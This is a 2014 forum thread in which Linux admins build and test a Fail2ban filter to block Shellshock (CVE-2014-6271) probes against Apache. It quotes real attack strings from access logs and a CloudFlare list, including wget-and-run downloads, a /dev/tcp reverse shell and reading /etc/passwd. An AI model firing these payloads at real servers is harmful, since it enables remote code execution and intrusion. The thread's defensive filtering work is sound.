LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Reload this Page [SOLVED] Bash "shellshock" CVE-2014-6271 CVE-2014-7169 - Apache2 Fail2ban Filter
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 09-25-2014, 09:06 PM   #1
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Rep: Reputation: Disabled
Bash "shellshock" CVE-2014-6271 CVE-2014-7169 - Apache2 Fail2ban Filter

after some grep'n of my /var/log/apache2/access.log

grep /bin/ /var/log/apache2/access.log
123.123.123.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 123.123.123.138"
123.123.123.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 123.123.0.123" "() { :; }; /bin/ping -c 1 123.123.0.123"

I want to make a filter that well blocks out the folks if they try a few times. So far ping seems to be the most common. but then again there is alot in there I need to look for more things.

failregex = ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(notsureneedhelp)s)"$

at least keep the some at bay. Any help would be great .
 
Old 09-25-2014, 09:29 PM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
Sorry, filtering post-op isnt a solution. Go patch instead.
 
Old 09-26-2014, 06:37 AM   #3
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
Thats just it the patch (since I am all patched to what ever is available) most I had to do from source code because nothing is yet available is all done on all my servers. (I have many)

The problem is that this is just the first patches and as we more understand the problem there will be more in the mean time I have clear scanning already starting in my logs from experimenters and websites used to detect and look for the flaw. I do not mind that but would like to take persistent attempts and block them to push folks away or at least stop them from going farther something anything.

So I want to be clear i am not filtering instead of patching . I have patched but would like to take more action. First versions of the patch CVE-2012-3410, CVE-2014-6271,CVE-2014-7169 was found not to be fully patched.

Just patching is not enough in my opinion. If you have a webserver just grep your logs

grep /bin/ /var/log/apache2/access.log
89.207.135.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 401 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/info.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /test HTTP/1.0" 404 389 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php5 HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
 
Old 09-26-2014, 09:49 AM   #4
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
How about this:
Code:
[Definition]
shellshock = ping|bash|other|...

failregex = ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(shellshock)s).*?"
wget may be perfectly valid for some situations, so I hesitate there.

Subscribed with interest....
 
Old 09-26-2014, 09:56 AM   #5
szboardstretcher
Senior Member
 
Registered: Aug 2006
Location: Detroit, MI
Distribution: GNU/Linux systemd
Posts: 4,278

Rep: Reputation: 1694Reputation: 1694Reputation: 1694Reputation: 1694Reputation: 1694Reputation: 1694Reputation: 1694Reputation: 1694Reputation: 1694Reputation: 1694Reputation: 1694
Quote:
Originally Posted by unSpawn View Post
Sorry, filtering post-op isnt a solution. Go patch instead.
I would patch and filter. Patch first though.

Tune up your HIDS/NIDS/Snort etc rules,.. remove mod_cgi if at all possible,..
 
Old 09-26-2014, 11:12 AM   #6
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
I am going to make a flaky attempt maybe someone could help me on this. I agree I have things that use wget in my attempt that I know will not work I am looking at the /bin and the error codes. I only have the logs I have and what I have seen online maybe folks have some weird logs that show attempts we can help form a decent filter.

Defiantly going to look closer at that szboardstretcher

Code:
[Definition]
shellshock = ping|bash|other|...

failregex = ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(ping)s).*?"
            ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(404 319)s).*?"
             ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(200 288)s).*?"
           ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(404 401)s).*?"
           ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(500 738)s).*?"
           ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(404 400)s).*?"
I don't think I have the right synax or if you get what I am saying maybe thats overkill. Trust me I did this wrong. Habitual can you make it like that I see where you where going with the shellshock but that was just some guy scanning the folks who are dirty will not say that
Last edited by charly78; 09-26-2014 at 11:15 AM.
 
Old 09-26-2014, 11:40 AM   #7
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
9 sample records from your post above in /var/log/test.log
Code:
89.207.135.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 401 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/info.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /test HTTP/1.0" 404 389 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php5 HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
and the filter in /etc/fail2ban/filter.d/shellshock.conf
Code:
[Definition]

docroot = /var/www/html
failregex  = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

ignoreregex =
and the test results:
Code:
fail2ban-regex /var/log/test.log  /etc/fail2ban/filter.d/shellshock.conf
Code:
Summary
=======

Addresses found:
[1]
    89.207.135.125 (Thu Sep 25 04:14:19 2014)
    198.20.69.74 (Thu Sep 25 17:42:32 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)

Date template hits:
18 hit(s): Day/MONTH/Year:Hour:Minute:Second

Success, the total number of match is 9
On Fail2Ban v0.8.10

I hope this helps.
Last edited by Habitual; 09-27-2014 at 12:53 PM. Reason: better failregex
 
Old 09-26-2014, 05:44 PM   #8
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
So. .
I got one of these today

Code:
/var/log/apache2/access.log:54.251.83.67 - - [26/Sep/2014:12:50:48 -0400] "GET / HTTP/1.1" 200 288 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
200 288 does'nt that mean they got my host name and my kernel version ugh

I am as patched up as the latest in the source and patches for bash as I can get
 
Old 09-26-2014, 11:22 PM   #9
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
well here is what I am using
Changes Updated as per Below

cat /etc/fail2ban/jail.conf
here is the bottom of my jail.local file
Code:
[shellshock]

enabled = true
port    = http,https
filter  = shellshock
action   = mail-whois[name=shellshock, dest=my@emailhere.co]
logpath = /var/log/apache*/access.log
maxretry = 1
and the filter put together and done by Habitual (Thanks man you rock)
cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]

# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf

[Definition]
#_daemon = apache2

# Option:  failregex
# Notes.:  regex to match the failures messages of bash in the logfile. The
#          host must be matched by a group named "host". The tag "<HOST>" can
#          be used for standard IP/hostname matching and is only an alias for
#          (?:::f{4,6}:)?(?P<host>\S+)
# Values:  TEXT
#

docroot = /var/www/html
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

# Option:  ignoreregex
# Notes.:  regex to ignore. If this regex matches, the line is ignored.
# Values:  TEXT
#
ignoreregex =
I have been getting warnings from this as folks try to hit me up. I know it can become more better as I see more attacks it will at least block a ip if its testing for something and well if your patched your at least logging a ip and blocking it too if there is another exploit . its something better then nothing
Last edited by charly78; 09-27-2014 at 11:05 PM.
 
Old 09-26-2014, 11:31 PM   #10
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
the folkes at https://news.ycombinator.com/item?id=8366745 have a fellow who works at CloudFlare post what they are getting hit with in there logs

Code:
() { :;}; /bin/ping -c 1 198.x.x.x
    () { :;}; echo shellshock-scan > /dev/udp/example.com/1234
    () { ignored;};/bin/bash -i >& /dev/tcp/104.x.x.x/80 0>&1
    () { test;};/usr/bin/wget http://example.com/music/file.mp3 -O ~/cgi-bin/file.mp3
    () { :; }; /usr/bin/curl -A xxxx http://112.x.x.x:8011
    () { :; }; /usr/bin/wget http://115.x.x.x/api/file.txt
    () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd
    () { :; }; /bin/bash -c "if [ $(/bin/uname -m | /bin/grep 64) ]; then /usr/bin/wget 82.x.x.x:1234/v64 -O /tmp/.osock; else /usr/bin/wget 82.x.x.x:1234/v -O /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock &
 
Old 09-27-2014, 12:31 PM   #11
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
It has been pointed out that my RegEx casts far too wide a net and that my HOST string may catch and ban legitimate traffic on your site with such keywords at shopping, or scraping or a referrer that may utilize "cgi-bin" in its referrer string.

I tested this new failregex using a duplicate line in /var/log/test using
Code:
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
198.20.69.75 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; anything here
Code:
fail2ban-regex /var/log/test.log  /etc/fail2ban/filter.d/shellshock.conf
This new failregex scans only for the function and space right after that is being abused, regardless of what that function is now, or may be in the future (a new 'variant'?)

I think it is more accurate for this purpose.
Code:
cat /etc/fail2ban/filter.d/shellshock.conf
[Definition]

docroot = /var/www/html
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

ignoreregex =
I have updated http://www.linuxquestions.org/questi...9/#post5244808

Peace.

Quote:
Originally Posted by charly78 View Post
well here is what I am using

cat /etc/fail2ban/jail.conf
here is the bottom of my jail.conf file...
and you really shouldn't make your changes in /etc/fail2ban/jail.conf, but a copy of it as /etc/fail2ban/jail.local

Saves your bacon if you upgrade fail2ban.

and on an unpatched system, this is akin to climbing over the fence to keep the hinges 'out'
Last edited by Habitual; 09-27-2014 at 01:11 PM.
 
Old 10-25-2014, 11:31 AM   #12
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
errors
I dunno but I seem to be getting some errors

here is my most recent info on the fail2ban filter


# cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]

# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf

[Definition]

#_daemon = apache2

# Option:  failregex
# Notes.:  regex to match the failures messages of bash in the logfile. The
#          host must be matched by a group named "host". The tag "<HOST>" can
#          be used for standard IP/hostname matching and is only an alias for
#          (?:::f{4,6}:)?(?P<host>\S+)
# Values:  TEXT
#

docroot = /var/www/html
#old original method revised 09/27/14
#shellshock = ping|cgi-bin|bash|wget|curl|cat
#failregex = ^<HOST> .*"(GET|POST) .*\/(?:%(shellshock)s).*?"
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

# Option:  ignoreregex
# Notes.:  regex to ignore. If this regex matches, the line is ignored.
# Values:  TEXT
#
ignoreregex =
# cat /etc/fail2ban/jail.local
Code:
[shellshock]

enabled = true
port    = http,https
filter  = shellshock
action   = mail-whois[name=shellshock, dest=shellshock@mydomain.com]
logpath = /var/log/apache*/access.log
maxretry = 1
bantime  = 29900
all seems good and grabs and emails me a whois so I can contact abuse email address.

Code:
cat /var/log/fail2ban.log                 
2014-10-19 04:48:03,221 fail2ban.server : INFO   Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-19 04:48:03,257 fail2ban.filter : INFO   Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:48:03,283 fail2ban.filter : INFO   Log rotation detected for /var/log/apache2/access.log
2014-10-19 04:48:03,597 fail2ban.filter : INFO   Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:49:44,232 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-19 04:50:01,389 fail2ban.filter : INFO   Log rotation detected for /var/log/apache2/access.log
2014-10-19 07:57:12,694 fail2ban.actions: WARNING [shellshock] Ban 5.135.35.32
2014-10-19 10:07:12,730 fail2ban.actions: WARNING [shellshock] Unban 5.135.35.32
2014-10-20 04:49:40,675 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-20 04:49:41,294 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-20 04:49:41,345 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-20 14:16:41,563 fail2ban.actions: WARNING [dovecot-pop3imap] Ban 218.5.76.26
2014-10-20 16:26:42,220 fail2ban.actions: WARNING [dovecot-pop3imap] Unban 218.5.76.26
2014-10-21 03:34:43,863 fail2ban.actions: WARNING [shellshock] Ban 184.106.228.211
2014-10-21 04:49:37,838 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,210 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,400 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,676 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-21 04:49:38,771 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,807 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,212 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,401 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,773 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,809 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,840 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 05:44:43,883 fail2ban.actions: WARNING [shellshock] Unban 184.106.228.211
2014-10-21 12:19:26,815 fail2ban.actions: WARNING [shellshock] Ban 104.192.0.18
2014-10-21 12:25:46,458 fail2ban.actions: WARNING [shellshock] 104.192.0.18 already banned
2014-10-21 14:29:27,793 fail2ban.actions: WARNING [shellshock] Unban 104.192.0.18
2014-10-22 00:14:30,322 fail2ban.jail   : INFO   Jail 'dovecot-pop3imap' stopped
2014-10-22 00:14:31,117 fail2ban.jail   : INFO   Jail 'courierauth' stopped
2014-10-22 00:14:32,093 fail2ban.jail   : INFO   Jail 'postfix' stopped
2014-10-22 00:14:32,816 fail2ban.jail   : INFO   Jail 'ssh-ddos' stopped
2014-10-22 00:14:33,161 fail2ban.jail   : INFO   Jail 'apache-multiport' stopped
2014-10-22 00:14:33,567 fail2ban.jail   : INFO   Jail 'pureftpd' stopped
2014-10-22 00:14:34,456 fail2ban.jail   : INFO   Jail 'couriersmtp' stopped
2014-10-22 00:14:35,176 fail2ban.jail   : INFO   Jail 'ssh' stopped
2014-10-22 00:14:35,718 fail2ban.jail   : INFO   Jail 'apache' stopped
2014-10-22 00:14:36,170 fail2ban.jail   : INFO   Jail 'sasl' stopped
2014-10-22 00:14:37,179 fail2ban.jail   : INFO   Jail 'shellshock' stopped
2014-10-22 00:14:37,417 fail2ban.jail   : INFO   Jail 'proftpd' stopped
2014-10-22 00:14:37,419 fail2ban.server : INFO   Exiting Fail2ban
2014-10-22 00:14:37,694 fail2ban.server : INFO   Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-22 00:14:37,695 fail2ban.jail   : INFO   Creating new jail 'dovecot-pop3imap'
2014-10-22 00:14:37,695 fail2ban.jail   : INFO   Jail 'dovecot-pop3imap' uses poller
2014-10-22 00:14:37,707 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,707 fail2ban.filter : INFO   Set maxRetry = 5
2014-10-22 00:14:37,708 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,708 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,712 fail2ban.jail   : INFO   Creating new jail 'pam-generic'
2014-10-22 00:14:37,712 fail2ban.jail   : INFO   Jail 'pam-generic' uses poller
2014-10-22 00:14:37,713 fail2ban.filter : INFO   Added logfile = /var/log/auth.log
2014-10-22 00:14:37,713 fail2ban.filter : INFO   Set maxRetry = 4
2014-10-22 00:14:37,714 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,714 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,719 fail2ban.jail   : INFO   Creating new jail 'ssh-ddos'
2014-10-22 00:14:37,719 fail2ban.jail   : INFO   Jail 'ssh-ddos' uses poller
2014-10-22 00:14:37,719 fail2ban.filter : INFO   Added logfile = /var/log/auth.log
2014-10-22 00:14:37,720 fail2ban.filter : INFO   Set maxRetry = 4
2014-10-22 00:14:37,720 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,720 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,724 fail2ban.jail   : INFO   Creating new jail 'apache-multiport'
2014-10-22 00:14:37,724 fail2ban.jail   : INFO   Jail 'apache-multiport' uses poller
2014-10-22 00:14:37,725 fail2ban.filter : INFO   Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,725 fail2ban.filter : INFO   Set maxRetry = 4
2014-10-22 00:14:37,725 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,726 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,729 fail2ban.jail   : INFO   Creating new jail 'apache-overflows'
2014-10-22 00:14:37,729 fail2ban.jail   : INFO   Jail 'apache-overflows' uses poller
2014-10-22 00:14:37,730 fail2ban.filter : INFO   Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,730 fail2ban.filter : INFO   Set maxRetry = 2
2014-10-22 00:14:37,731 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,731 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,735 fail2ban.jail   : INFO   Creating new jail 'couriersmtp'
2014-10-22 00:14:37,735 fail2ban.jail   : INFO   Jail 'couriersmtp' uses poller
2014-10-22 00:14:37,735 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,736 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,736 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,737 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,740 fail2ban.jail   : INFO   Creating new jail 'pureftpd'
2014-10-22 00:14:37,740 fail2ban.jail   : INFO   Jail 'pureftpd' uses poller
2014-10-22 00:14:37,740 fail2ban.filter : INFO   Added logfile = /var/log/syslog
2014-10-22 00:14:37,741 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,741 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,742 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,745 fail2ban.jail   : INFO   Creating new jail 'ssh'
2014-10-22 00:14:37,745 fail2ban.jail   : INFO   Jail 'ssh' uses poller
2014-10-22 00:14:37,746 fail2ban.filter : INFO   Added logfile = /var/log/auth.log
2014-10-22 00:14:37,746 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,746 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,747 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,816 fail2ban.jail   : INFO   Creating new jail 'postfix'
2014-10-22 00:14:37,816 fail2ban.jail   : INFO   Jail 'postfix' uses poller
2014-10-22 00:14:37,816 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,817 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,817 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,818 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,821 fail2ban.jail   : INFO   Creating new jail 'sasl'
2014-10-22 00:14:37,821 fail2ban.jail   : INFO   Jail 'sasl' uses poller
2014-10-22 00:14:37,821 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,822 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,822 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,823 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,827 fail2ban.jail   : INFO   Creating new jail 'apache'
2014-10-22 00:14:37,827 fail2ban.jail   : INFO   Jail 'apache' uses poller
2014-10-22 00:14:37,827 fail2ban.filter : INFO   Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,828 fail2ban.filter : INFO   Set maxRetry = 4
2014-10-22 00:14:37,828 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,828 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,831 fail2ban.jail   : INFO   Creating new jail 'courierauth'
2014-10-22 00:14:37,831 fail2ban.jail   : INFO   Jail 'courierauth' uses poller
2014-10-22 00:14:37,832 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,832 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,833 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,833 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,836 fail2ban.jail   : INFO   Creating new jail 'shellshock'
2014-10-22 00:14:37,836 fail2ban.jail   : INFO   Jail 'shellshock' uses poller
2014-10-22 00:14:37,837 fail2ban.filter : INFO   Added logfile = /var/log/apache2/access.log
2014-10-22 00:14:37,837 fail2ban.filter : INFO   Set maxRetry = 1
2014-10-22 00:14:37,838 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,839 fail2ban.actions: INFO   Set banTime = 20000
2014-10-22 00:14:37,842 fail2ban.jail   : INFO   Creating new jail 'proftpd'
2014-10-22 00:14:37,842 fail2ban.jail   : INFO   Jail 'proftpd' uses poller
2014-10-22 00:14:37,843 fail2ban.filter : INFO   Set maxRetry = 6
2014-10-22 00:14:37,843 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,843 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,852 fail2ban.jail   : INFO   Jail 'dovecot-pop3imap' started
2014-10-22 00:14:37,854 fail2ban.jail   : INFO   Jail 'pam-generic' started
2014-10-22 00:14:37,855 fail2ban.jail   : INFO   Jail 'ssh-ddos' started
2014-10-22 00:14:37,855 fail2ban.jail   : INFO   Jail 'apache-multiport' started
2014-10-22 00:14:37,856 fail2ban.jail   : INFO   Jail 'apache-overflows' started
2014-10-22 00:14:37,857 fail2ban.jail   : INFO   Jail 'couriersmtp' started
2014-10-22 00:14:37,858 fail2ban.jail   : INFO   Jail 'pureftpd' started
2014-10-22 00:14:37,858 fail2ban.jail   : INFO   Jail 'ssh' started
2014-10-22 00:14:37,859 fail2ban.jail   : INFO   Jail 'postfix' started
2014-10-22 00:14:37,860 fail2ban.jail   : INFO   Jail 'sasl' started
2014-10-22 00:14:37,860 fail2ban.jail   : INFO   Jail 'apache' started
2014-10-22 00:14:37,862 fail2ban.jail   : INFO   Jail 'courierauth' started
2014-10-22 00:14:37,863 fail2ban.jail   : INFO   Jail 'shellshock' started
2014-10-22 00:14:37,863 fail2ban.jail   : INFO   Jail 'proftpd' started
2014-10-22 04:49:33,038 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-23 04:49:40,900 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-23 21:36:21,767 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:28,922 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:36,139 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:44,704 fail2ban.actions: WARNING [pureftpd] Ban 60.176.110.32
2014-10-23 21:36:45,336 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 23:46:45,404 fail2ban.actions: WARNING [pureftpd] Unban 60.176.110.32
2014-10-24 04:49:40,119 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,409 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,448 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,519 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,615 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
